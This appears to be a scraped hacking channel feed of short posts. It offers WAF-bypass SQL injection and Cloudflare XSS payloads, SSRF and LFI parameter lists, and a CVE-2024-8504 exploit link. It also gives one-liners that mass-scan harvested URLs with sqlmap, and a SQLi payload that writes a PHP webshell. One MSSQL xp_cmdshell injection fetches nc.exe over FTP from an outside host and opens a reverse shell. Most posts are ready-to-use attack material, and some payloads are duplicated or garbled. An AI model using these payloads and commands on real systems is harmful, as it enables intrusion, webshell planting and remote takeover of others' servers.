Bypass waf firewall
To increase the likelihood of a successful injection test using these random payloads, you can follow some approaches and techniques that vary the payloads based on how the database servers interpret the queries.
Using Substitutions in Keywords
You can substitute words like or, xor, and || to disable security filters.
Example:
. Entering camouflaged spaces and comments
Some filters may ignore comments or spaces. You can add comments like /**/ or use different types of spaces.
Example:
using mathematical expressions
Sometimes it can be useful to use mathematical expressions to avoid filters that look for explicit numbers.
Example:
Changing the simple formula
The formula for simple payloads can also be changed.
Example:
Mixing multiple payloads in a single request
You can combine two or more payloads to increase complexity.
Example:
Entering different parentheses
Some databases handle parentheses differently. You can use alternate parentheses to bypass filters.
Example:
Using Uncommon Phrases
Using uncommon or advanced phrases like benchmark instead of sleep may help avoid detection.
Example:
Logical Construct Tests
You can also test loads with logical constructs.
Example:
Complete
example:
Here are some more random payloads to use in your SQL injection test:
Combine some of these payloads:
You can mix payloads together to make the attack
more complex:
These payloads randomly diversify attacks that may pass through some filters or protection methods.
#waf #sql
To increase the likelihood of a successful injection test using these random payloads, you can follow some approaches and techniques that vary the payloads based on how the database servers interpret the queries.
Using Substitutions in Keywords
You can substitute words like or, xor, and || to disable security filters.
Example:
or sleep(4) ➔ oR sLeEP(4) or xor sleep(4)
. Entering camouflaged spaces and comments
Some filters may ignore comments or spaces. You can add comments like /**/ or use different types of spaces.
Example:
or sleep(4) ➔ or//sleep(4) or or sLeEp(//4)
using mathematical expressions
Sometimes it can be useful to use mathematical expressions to avoid filters that look for explicit numbers.
Example:
4 ➔ 6-2 or true+true
Changing the simple formula
The formula for simple payloads can also be changed.
Example:
sleep(4) ➔ sleep((4)) or benchmark(4)
Mixing multiple payloads in a single request
You can combine two or more payloads to increase complexity.
Example:
%27 or sleep(4) -- ➔ %27 oR sLeEP(4) || true+true --
4|0 or benchmark(4) ➔ (4|0) oR beNCHMark(/**/4)
Entering different parentheses
Some databases handle parentheses differently. You can use alternate parentheses to bypass filters.
Example:
or (sleep(4)) ➔ or %28sleep%2
84%29
Using Uncommon Phrases
Using uncommon or advanced phrases like benchmark instead of sleep may help avoid detection.
Example:
or sleep(4) ➔ or bench
mark(4)
Logical Construct Tests
You can also test loads with logical constructs.
Example:
or sleep(4) ➔ or (sleep(4) && true=true)
Complete
example:
' oR sLeEP(/**/4) || true+true --
Here are some more random payloads to use in your SQL injection test:
'%27 OR sleep(4) --
%28%29 XOR sLeEp(4) --
(4|0) oR beNCHMark(/**/4) --
' OR 6-2=4 || sleep(4) --
') OR true+true=sleep(4) --
%27 oR sLeEp(4) = (true) --
' xor sLeEP((4)) --
%27 = (1=(sleep(4))) --
%28%29 OR beNcHmArk(4) --
' XOR sleep(/**/4)
|| -true*4 --
Combine some of these payloads:
You can mix payloads together to make the attack
more complex:
'%27 OR sleep(4) || (true=true) -- ')
These payloads randomly diversify attacks that may pass through some filters or protection methods.
#waf #sql
❤6👍3
Bypassing WAF (Web Application Firewall) in XSS (Cross-Site Scripting) attacks relies on exploiting various techniques and methods to bypass the protection put in place by the firewall. WAF is designed to intelligently inspect inputs and requests to detect potential attacks such as XSS, but there are several ways to bypass these mechanisms. Here are some techniques that may help in bypassing WAF in XSS attacks:
1.Encoding
Input encoding can be used to confuse WAF and prevent malicious payload detection.
Examples:
URL Encoding:
It can be encoded:
HTML Entity Encoding:
Special characters can be converted to HTML encoding:
2.Using Comments
Some WAFs may ignore input if the code is split via comments.
Examples:
XSS using comments to split code:
3. Case Variation
WAF can be case sensitive. You can change the case to make the code undetectable.
Examples:
4.Use Alternative Event Handlers
Events in HTML that may not be strictly checked by WAF, such as onfocus or onmouseover, can be exploited.
Example:
May be replaced by:
5.Bypass WAF using Adding Padding Characters
You can add spaces or insignificant characters inside the malicious code to make it undetectable.
Examples:
6.Use eval(), setTimeout(), or setInterval()
Some WAFs scan for obvious code like alert() or document.write(). By using functions like eval() or setTimeout(), you can make malicious code less obvious.
Example:
7.JavaScript Coding Using String.fromCharCode
You can use the String.fromCharCode function to generate JavaScript code dynamically.
Example:
This will print "XSS".
8.Using DOM-based XSS techniques
In some cases, WAF can be bypassed using techniques that rely on XSS in the DOM only, where the code is injected directly into the browser without having to send the request to the server.
Example:
9.Hiding code inside unexpected media
You can embed XSS code inside non-traditional HTML elements, such as SVG files or titles.
Example:
10.Use complex conditional statements or mathematical functions
You can use conditional statements or mathematical operations to make malicious code less obvious to a WAF.
Example:
11.Using JavaScript: In URL
You can try to insert JavaScript code inside a URL using the javascript: protocol.
Example:
12. Exploiting weak or non-comprehensive filters
Some WAFs may not scan all input types or fields. You can try to inject malicious code in unexpected places such as hidden fields or metadata.
Example:
Injecting malicious code into an unexpected field:
Conclusion:
Bypassing WAF in XSS attacks requires experimenting with different techniques and using innovative ways to make the malicious code undetectable. Protection from these attacks depends on constantly updating WAF mechanisms and following good security practices such as input filtering and output encoding.
#xss #waf
1.Encoding
Input encoding can be used to confuse WAF and prevent malicious payload detection.
Examples:
URL Encoding:
<script>alert('XSS')</script>It can be encoded:
%3Cscript%3Ealert%28%27XSS%27%29%3C%2Fscript%3E
HTML Entity Encoding:
Special characters can be converted to HTML encoding:
<script>alert('XSS')</script>
2.Using Comments
Some WAFs may ignore input if the code is split via comments.
Examples:
XSS using comments to split code:
<scr<!--comment-->ipt>alert('XSS')</scr<!--comment-->ipt>3. Case Variation
WAF can be case sensitive. You can change the case to make the code undetectable.
Examples:
<ScRipT>alert('XSS')</sCrIpT>4.Use Alternative Event Handlers
Events in HTML that may not be strictly checked by WAF, such as onfocus or onmouseover, can be exploited.
Example:
<img src="x" onerror="alert('XSS')">May be replaced by:
<input onfocus="alert('XSS')">5.Bypass WAF using Adding Padding Characters
You can add spaces or insignificant characters inside the malicious code to make it undetectable.
Examples:
<scr ipt>alert('XSS')</scr ipt>6.Use eval(), setTimeout(), or setInterval()
Some WAFs scan for obvious code like alert() or document.write(). By using functions like eval() or setTimeout(), you can make malicious code less obvious.
Example:
<script>setTimeout(function(){alert('XSS')}, 100);</script>7.JavaScript Coding Using String.fromCharCode
You can use the String.fromCharCode function to generate JavaScript code dynamically.
Example:
<script>alert(String.fromCharCode(88,83,83));</script>
This will print "XSS".
8.Using DOM-based XSS techniques
In some cases, WAF can be bypassed using techniques that rely on XSS in the DOM only, where the code is injected directly into the browser without having to send the request to the server.
Example:
var input = document.createElement('input');
input.setAttribute('onfocus', 'alert("XSS")');
document.body.appendChild(input);
input.focus();9.Hiding code inside unexpected media
You can embed XSS code inside non-traditional HTML elements, such as SVG files or titles.
Example:
<svg onload="alert('XSS')"></svg>10.Use complex conditional statements or mathematical functions
You can use conditional statements or mathematical operations to make malicious code less obvious to a WAF.
Example:
<script>if(1<2){alert('XSS')}</script>11.Using JavaScript: In URL
You can try to insert JavaScript code inside a URL using the javascript: protocol.
Example:
<a href="javascript:alert('XSS')">Click me</a>12. Exploiting weak or non-comprehensive filters
Some WAFs may not scan all input types or fields. You can try to inject malicious code in unexpected places such as hidden fields or metadata.
Example:
Injecting malicious code into an unexpected field:
<input type="hidden" value="<script>alert('XSS')</script>">Conclusion:
Bypassing WAF in XSS attacks requires experimenting with different techniques and using innovative ways to make the malicious code undetectable. Protection from these attacks depends on constantly updating WAF mechanisms and following good security practices such as input filtering and output encoding.
#xss #waf
👍9❤5
cloudflare bypass payloads
Payload:
Payload:
Payload:
payload:
payload:
payload:
payload:
payload:
payload:
payload:
Payload:
Payload:
payload:
Payload:
Payload:
Payload:
Payload:
#xss #waf #cloudflare #bypass
Payload:
<A HRef=//X55.is AutoFocus %26%2362 OnFocus%0C=import(href)>
Payload:
<A HRef=//X55.is AutoFocus %26%2362 OnFocus%0C=import(href)>
Payload:
"*prompt(document.domain)*"
payload:
<img/src=x onError="`${x}`;alert(`Hello`);">payload:
<img%20hrEF="x"%20sRC="data:x,"%20oNLy=1%20oNErrOR=prompt`1`>
payload:
<img/src/onerror=setTimeout(atob(/YWxlcnQoMTMzNyk/.source))>
payload:
"%3cSvg%20Only%3d1%20OnLoad%3dconfirm(1)%3e"
payload:
<select><style></select><svg onload=alert(1)></style>
payload:
"><img src=x onerrora=confirm() onerror=confirm(1)>
payload:
<dETAILS%0aopen%0aonToGgle%0a%3d%0aa%3dprompt,a(origin)%20x>
Payload:
"><input%252bTyPE%25253d"hxlxmj"%252bSTyLe%25253d"display%25253anone%25253b"%252bonfocus%25253d"this.style.display%25253d'block'%25253b%252bthis.onfocus%25253dnull%25253b"%252boNMoUseOVer%25253d"this['onmo'%25252b'useover']%25253dnull%25253beval(String.fromCharCode(99,111,110,102,105,114,109,40,100,111,99,117,109,101,110,116,46,100,111,109,97,105,110,41))%25253b"%252bAuToFOcus>
Payload:
%3CSVG/oNlY=1%20ONlOAD=confirm(document.domain)%3E
payload:
<img/src=x onError="`${x}`;alert(`Hello`);">Payload:
"><track/onerror='confirm\%601\%60'>
Payload:
"><track/onerror='confirm`1`'>
Payload:
<inpuT autofocus oNFocus="setTimeout(function() { /*\*/top['al'+'\u0065'+'rt']([!+[]+!+[]]+[![]+[]][+[]])/*\*/ }, 5000);"></inpuT%3E&lT;/stYle&lT;/titLe&lT;/teXtarEa&lT;/scRipt&gT;
Payload:
<inpuT autofocus oNFocus="setTimeout(function() { /*\`*/top['al'+'\u0065'+'rt']([!+[]+!+[]]+[![]+[]][+[]])/*\`*/ }, 5000);"></inpuT%3E&lT;/stYle&lT;/titLe&lT;/teXtarEa&lT;/scRipt&gT;
#xss #waf #cloudflare #bypass
👍6🔥3❤1🥰1
Top 25 SSRF parameters
• ?dest={target}
• ?redirect={target}
• ?uri={target}
• ?path={target}
• ?continue={target}
• ?url={target}
• ?window={target}
• ?next={target}
• ?data={target}
• ?reference={target}
• ?site={target}
• ?html={target}
• ?val={target}
• ?validate={target}
• ?domain={target}
• ?callback={target}
• ?return={target}
• ?page={target}
• ?feed={target}
• ?host={target}
• ?port={target}
• ?to={target}
• ?out={target}
• ?view={target}
• ?dir={target}
• ?dest={target}
• ?redirect={target}
• ?uri={target}
• ?path={target}
• ?continue={target}
• ?url={target}
• ?window={target}
• ?next={target}
• ?data={target}
• ?reference={target}
• ?site={target}
• ?html={target}
• ?val={target}
• ?validate={target}
• ?domain={target}
• ?callback={target}
• ?return={target}
• ?page={target}
• ?feed={target}
• ?host={target}
• ?port={target}
• ?to={target}
• ?out={target}
• ?view={target}
• ?dir={target}
👍8
⚡️ Exploit for CVE-2024-8504 & CVE-2024-8503: SQLi and RCE ⚡️
https://github.com/Chocapikk/CVE-2024-8504/blob/main/
https://github.com/Chocapikk/CVE-2024-8504/blob/main/
🥰4👏1
## Reverse Engineering the XSS Cloudflare WAF Bypass
Let's break down how this XSS payload bypasses Cloudflare's WAF:
Encoded Payload:
Clean Payload:
This injects a <track> tag into the HTML. The onerror attribute allows us to execute JavaScript when an error occurs during track loading.
4. JavaScript Execution: The JavaScript code confirm1 is treated as a function call. Since confirm() is a built-in JavaScript function, this will trigger a confirmation popup box. This demonstrates successful XSS execution.
Why this bypasses Cloudflare WAF:
Cloudflare's WAF likely has rules to detect common XSS patterns, including the use of <script>, eval(), and potentially even onerror with specific event handlers. However, by combining HTML entity encoding and URL encoding, the attacker has obfuscated the payload enough to bypass these basic checks.
Key Takeaways:
* Encoding Techniques are crucial for bypassing WAFs: Attackers use various encoding methods to make malicious payloads appear benign.
* WAFs need to be constantly updated: WAF rules need to evolve to catch increasingly sophisticated bypass techniques.
* Understanding the underlying mechanisms is key to both attack and defense: By analyzing how a payload works, we can better understand how to craft effective bypasses and how to improve WAF rules to prevent them.
Note: This is a simplified explanation. Real-world WAF bypasses can be much more complex and involve multiple layers of obfuscation and exploitation techniques.
#xss #waf
Let's break down how this XSS payload bypasses Cloudflare's WAF:
Encoded Payload:
"><track/onerror='con %60'>
Clean Payload:
"><track/onerror='confirm1'>
Encoding Techniques:
* HTML Entity Encoding: The double quote (") is encoded as " and the greater than symbol (>) is encoded as >. This helps evade basic WAF filters that look for these characters in their raw form.
* URL Encoding: The backtick () is URL encoded as %60. This can help bypass filters that specifically look for the backtick character which is commonly used in XSS payloads.
Bypass Mechanism:
1. HTML Entity Decoding: The browser decodes the HTML entities " and > back into their original characters: " and >.
2. URL Decoding: The browser decodes %60 back to a backtick ().
3. Payload Execution: The resulting payload becomes:
"><track/onerror='confirm1'>
This injects a <track> tag into the HTML. The onerror attribute allows us to execute JavaScript when an error occurs during track loading.
4. JavaScript Execution: The JavaScript code confirm1 is treated as a function call. Since confirm() is a built-in JavaScript function, this will trigger a confirmation popup box. This demonstrates successful XSS execution.
Why this bypasses Cloudflare WAF:
Cloudflare's WAF likely has rules to detect common XSS patterns, including the use of <script>, eval(), and potentially even onerror with specific event handlers. However, by combining HTML entity encoding and URL encoding, the attacker has obfuscated the payload enough to bypass these basic checks.
Key Takeaways:
* Encoding Techniques are crucial for bypassing WAFs: Attackers use various encoding methods to make malicious payloads appear benign.
* WAFs need to be constantly updated: WAF rules need to evolve to catch increasingly sophisticated bypass techniques.
* Understanding the underlying mechanisms is key to both attack and defense: By analyzing how a payload works, we can better understand how to craft effective bypasses and how to improve WAF rules to prevent them.
Note: This is a simplified explanation. Real-world WAF bypasses can be much more complex and involve multiple layers of obfuscation and exploitation techniques.
#xss #waf
🔥6🦄3❤1👍1
Finding Parameter + XSS using Arjun & KXSS
kxss
Arjun
#xss
#bug_bounty
arjun -q -u target -oT arjun && cat arjun | awk -F'[?&]' '{baseUrl=$1; for(i=2; i<=NF; i++) {split($i, param, "="); print baseUrl "?" param[1] "="}}' | kxsskxss
Arjun
#xss
#bug_bounty
GitHub
GitHub - Emoe/kxss: This a adaption of tomnomnom's kxss tool with a different output format
This a adaption of tomnomnom's kxss tool with a different output format - Emoe/kxss
🔥6❤2
One liner to find RCE
cat targets.txt | httpx -path "/cgi-bin/admin.cgi?Command=sysCommand&Cmd=id" -nc -ports 80,443,8080,8443 -mr "uid=" -silent
🔥7👌2👍1
Metode untuk mencari kerentanan Sqli :
Command Line Tools Like a Pro
1.
2.
3.
4.
5.
#sqli #sql
Command Line Tools Like a Pro
1.
sublist3r -d target | tee -a domains.txt
2.
cat domains.txt | httpx | tee -a alive.txt
3.
cat alive.txt | waybackurls | tee -a urls.txt
4.
gf sqli urls >> sqli.txt
5.
sqlmap -m sqli.txt --dbs --batch --level 3 --risk 2 --time-sec 10 --random-agent
#sqli #sql
❤5🔥2👏2👍1
One line to find an XSS vulnerability, you can edit and add other things
#xss
echo "testphp.vulnweb.com" | waybackurls | gf xss | uro | qsreplace '"><img src=x onerror=alert(1);>' | freq
#xss
❤3🦄3
SQLMap from Waybackurls
#sql
waybackurls target | grep -E '\bhttps?://\S+?=\S+' | grep -E '\.php|\.asp' | sort -u | sed 's/\(=[^&]*\)/=/g' | tee urls.txt | sort -u -o urls.txt && cat urls.txt | xargs -I{} sqlmap --technique=T --batch -u "{}"#sql
👍2👏2
LFI Vulnerability Testing
?dir={payload}
?action={payload}
?date={payload}
?detail={payload}
?file={payload}
?download={payload}
?path={payload}
?folder={payload}
?include={payload}
?page={payload}
?locate={payload}
?site={payload}
#LFI
?dir={payload}
?action={payload}
?date={payload}
?detail={payload}
?file={payload}
?download={payload}
?path={payload}
?folder={payload}
?include={payload}
?page={payload}
?locate={payload}
?site={payload}
#LFI
👍4
Transition from SQL injection to shell or backdoor
We use the “into outfile” command to write to a file:
We capture the request in Burp Proxy and save it to the post-request file, then run
sqlmap:
reverse netcat shell via mssql injection when xp_cmdshell is available:
#sql #shell
We use the “into outfile” command to write to a file:
' union select 1, '<?php system($_GET["cmd"]); ?>' into outfile '/var/www/dvwa/cmd.php' #
We capture the request in Burp Proxy and save it to the post-request file, then run
sqlmap:
sqlmap -r post-request -p item --level=5 --risk=3 --dbms=mysql --os-shell --threads 10
reverse netcat shell via mssql injection when xp_cmdshell is available:
1000';+exec+master.dbo.xp_cmdshell+'(echo+open+10.11.0.245%26echo+anonymous%26echo+whatever%26echo+binary%26echo+get+nc.exe%26echo+bye)+>+c:\ftp.txt+%26+ftp+-s:c:\ftp.txt+%26+nc.exe+10.11.0.245+443+-e+cmd';--
#sql #shell
🦄3✍2🔥2❤1👍1